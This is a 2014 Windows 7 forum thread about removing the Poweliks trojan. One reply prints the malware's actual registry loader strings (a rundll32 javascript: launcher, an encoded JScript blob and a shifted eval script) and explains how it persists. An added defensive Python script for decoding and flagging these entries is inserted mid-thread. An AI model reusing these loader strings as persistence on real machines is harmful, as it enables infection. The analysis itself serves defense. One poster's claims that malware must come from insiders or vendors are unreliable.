Windows 7 Forums

Windows 7: Trojan.Poweliks

12 Dec 2014   #1
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 
Trojan.Poweliks

Well, picked up a nasty Trojan Wednesday and after working on it that night and the next morning I gave up and let Norton's support tech take care of it. Watch out for "Trojan.Poweliks", which looks like "TROJAN.AdClicker Activity" and some routine messing with MS PowerShell. This was the first one of those things in 50-plus years in the computer world that was over my head. It was not from this site, but I know which one. How it got me is a total mystery. It appears to be attacking military-related sites.


13 Dec 2014   #2
A Guy

Microsoft Community Contributor Award Recipient

Windows 7 Home Premium x64 SP1
 
 

13 Dec 2014   #3
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Poweliks is malware with rootkit-like features: it resides in the registry (and loads into memory), is persistent, and is not present as a file which can be scanned and removed easily. The payload (malware file) is stored in an encrypted registry value and is loaded at boot time by a key calling the rundll32 process with an encrypted JavaScript payload.

Associated Poweliks Windows Registry Information:

Code:
HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\current 

HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1

HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 " " = "rundll32.exe javascript:"\.\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))"

HKCU\\software\\classes\\clsid\\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\\localserver32 "a" = "<data to execute>" 
Once the payload is loaded, it executes an embedded PowerShell script in silent mode. That PowerShell script contains another encoded payload which is injected into a legitimate dllhost process (the persistent item); this acts as a trojan downloader for other malware and is also responsible for protecting the registry value by recreating it when removed.

Removal can be attained with these tools (plus additional scans: AV, MBAM, HitmanPro among others) after disabling/removing the persistent item.

Farbar Recovery Scan Tool: Farbar Recovery Scan Tool Download
RogueKiller (by Tigzy): Poweliks removal with RogueKiller
ESET Poweliks Cleaner How do I remove a Poweliks infection? - ESET Knowledgebase

The trojan wrecks several Windows "defense" services: Security Center, Defender, Windows Update, Firewall, etc.
ESET Services Repair: http://kb.eset.com/library/ESET/KB%2...icesRepair.exe <<<Direct DL link

ETA: Relevant links/analysis/removal instructions:

KernelMode.info
http://kb.eset.com/esetkb/index?page...nt&id=SOLN3587
http://www.adlice.com/poweliks-remov...h-roguekiller/
http://www.bleepingcomputer.com/viru...oweliks-trojan
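The two registry values above, worked through offline, as an added example that is not part of the post or of any of the linked tools. It uses only the Python standard library; the function names, the regular expressions and the benign "Sidebar" Run entry are mine, and the FRST-style line format is taken from the post's own listing. One transcription note: in the localserver32 value as reproduced in the post, nothing decodes to the opening brace of the CLSID (the closing brace comes from the "~"), so the decoded path shows the brace missing.

```python
"""Offline triage of the Poweliks registry persistence described above.
Added example, not code from the thread or from any tool it links.

* decode_shift_layer() reverses the obfuscation in the localserver32 value:
  each character of the quoted literal was shifted up by one code point and
  String.fromCharCode(_.charCodeAt()-1) shifts it back at run time.
* scan_autorun_lines() walks FRST-style "HKU\...\Run: [name] => value" lines
  and flags the two indicators from the post: rundll32 handed a javascript:
  URL, and a value that starts with the JScript.Encode marker "#@~^".

Nothing here touches a live registry.  SAMPLE_LINES holds one constructed
benign entry plus the two Run entries copied from the post (the first is
truncated there and is kept truncated).
"""
import re
from urllib.parse import unquote

JSCRIPT_ENCODE_MARKER = "#@~^"      # prefix Microsoft's JScript.Encode emits
RUNDLL32_JS = re.compile(r"rundll32(?:\.exe)?\s+javascript:", re.IGNORECASE)
FRST_RUN_LINE = re.compile(
    r"^(?P<key>HK[A-Z]+\\.*?\\Run): \[(?P<name>[^\]]*)\] => (?P<value>.*)$"
)
EVAL_LITERAL = re.compile(r'eval\("(?P<lit>[^"]*)"\.replace\(')
REGREAD_ARG = re.compile(r"RegRead\('(?P<path>[^']*)'\)")


def decode_shift_layer(encoded, shift=1):
    """Undo the per-character shift applied to the literal before eval()."""
    return "".join(chr(ord(c) - shift) for c in encoded)


def analyze_localserver32(value):
    """Decode a rundll32 javascript: value of the eval("...".replace(...)) form.

    Returns {"decoded": <script eval() would run>, "reads": <registry value
    it pulls the next stage from>} or None when the value lacks that shape.
    The value is a URL, so %20 is decoded first.
    """
    m = EVAL_LITERAL.search(unquote(value))
    if not m:
        return None
    decoded = decode_shift_layer(m.group("lit"))
    path = None
    r = REGREAD_ARG.search(decoded)
    if r:
        # The decoded JS source spells the path with \\ escapes; collapse
        # them to the single backslashes of the real key path.
        path = r.group("path").replace("\\\\", "\\")
    return {"decoded": decoded, "reads": path}


def scan_autorun_lines(lines):
    """Return [(line_no, [reasons...])] for Run entries worth a second look."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = FRST_RUN_LINE.match(line.strip())
        value = m.group("value") if m else line.strip()
        reasons = []
        if RUNDLL32_JS.search(value):
            reasons.append("rundll32 launched with a javascript: URL "
                           "(mshtml RunHTMLApplication loader)")
        if value.startswith(JSCRIPT_ENCODE_MARKER):
            reasons.append("JScript.Encode blob (#@~^) stored as the command")
        if reasons:
            findings.append((n, reasons))
    return findings


# Constructed benign entry, then the two entries copied from the post.
SAMPLE_LINES = [
    r'HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [Sidebar] => '
    r'C:\Program Files\Windows Sidebar\sidebar.exe /autoRun',
    r'HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [**a<*>] => '
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write('
    r'"\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell"))'
    r'.RegRead("HKCU\\software\\microsoft\\windows\\current',
    r'HKU\S-1-5-21-1207855306-3296853362-3562190217-1000\...\Run: [] => '
    r'#@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n '
    r'vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,'
    r'Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1',
]

# The localserver32 default value from the post, verbatim.
LOCALSERVER32_VALUE = (
    r'rundll32.exe javascript:"\.\mshtml,RunHTMLApplication ";eval("'
    'epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)'
    '(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]'
    'bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*'
    '".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))'
)

if __name__ == "__main__":
    for n, reasons in scan_autorun_lines(SAMPLE_LINES):
        print(f"line {n}: " + "; ".join(reasons))
    print(analyze_localserver32(LOCALSERVER32_VALUE)["decoded"])
```

Run as a script it prints the two flagged Run entries and the decoded loader. The decoded string is the point: the Run value never carries the payload itself, it reads the "a" value under the CLSID's localserver32 key and hands it to the script engine as jscript.encode, which is why a file-based scan of the disk turns up nothing.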

13 Dec 2014   #4
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 

Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....
13 Dec 2014   #5
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

False positive...
VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

Did you read thru the comprehensive links in my post?

ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.
13 Dec 2014   #6
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Quote: Originally Posted by dustymars
Norton's deletes "Farbar Recovery Scan Tool" so now what? It ain't nice to fool mother Norton.....
Wait, whut???? I thought Norton support tech "took care of it"

Quote: Originally Posted by dustymars
Well, picked up a nasty Trojan Wednesday...I gave up and let Norton's support tech take care of it. ...
Apparently, not so much. Are you still infected?
13 Dec 2014   #7
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 

Quote: Originally Posted by Urthboundmisfit
False positive...
VirusTotal: https://www.virustotal.com/en/file/b...is/1418475705/
Herd Protect: Malware scan of frst64.exe 67235de49a032cfbe0f902708d49d38cefaf4f0e - herdProtect

Disable Norton temporarily (side note: I find Norton to be about as useful as a screen door on a submerged submarine; YMMV) & Run FRST. Alternatively, disable the offending COM object dll & run either of the other 2 tools.

Did you read thru the comprehensive links in my post?

ETA: MalwareBytes' Anti Rootkit (Beta) claims to remove Poweliks. Google it.
I use SUPERAntiSpyware, AdwCleaner, MBAM, I forget some, SpyBot maybe, and MalwareBytes' Anti Rootkit, but none of them got rid of it. Norton's did and I checked it out, no more Trojan. I suspect some would like us to get rid of Norton's and buy their product? This is what I say, “Non Gradus Anus Rodentum..”

I said Norton's did not like the link you posted, so I will not discard it just because you suggest it. There are other ways to get it done. No, I am not infected, or at least no traces of it are in my PC.
13 Dec 2014   #8
Urthboundmisfit

Win 10 Pro x64, Win 7 Pro x64
 
 

Quote: Originally Posted by dustymars
...I suspect some would like us to get rid of MNorton's and buy their product?This what I say, “Non Gradus Anus Rodentum..”
My misunderstanding, though by your wording ("now what") I was under the impression you were still infected/had lingering effects.

I've never paid a cent EVER for any AV, never recommended any AV and never will. I am currently using Avast Free with only File system shield & Web shield... none of the other bells whistles & shiny objects being presented as "protection" these days.

As for Norton, to each his own, hence "YMMV". BTW, you're welcome for the info/links etc.

Unsubscribing...
13 Dec 2014   #9
dustymars

Microsoft Windows 7 Home Premium 64-bit 7601 Multiprocessor Free Service Pack 1
 
 

Plus, I certainly do not trust Microsoft for any security for my PC, given the glitches in their updates of late and the holes they somehow forget in their software. While some of the professional hackers may have the know-how and some amateur hackers may have a few brain cells left, they are not smart enough to find the holes and make malware/viruses, so it has to be some insider selling the information or a former disgruntled employee selling the information. I would not put it past the so-called anti-virus guys doing evil deeds either. Never trust anyone on the Net -- not even its inventor, Al Gore.

The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.
13 Dec 2014   #10
Borg 386

Win 7 32 Home Premium, Win 7 64 Pro, Win 8.1, Win 10
 
 

Quote: Originally Posted by dustymars
The e-mail from the so-called USPS I got was trashed, but then my mouse hover sensitivity was set to fast and somehow it clicked it and the Trojan got me! That is fixed so my old hands will not glitch again.
Yepperz, lots of scam E Mails this time of year.

Beware this online shopping scam: Fake order confirmations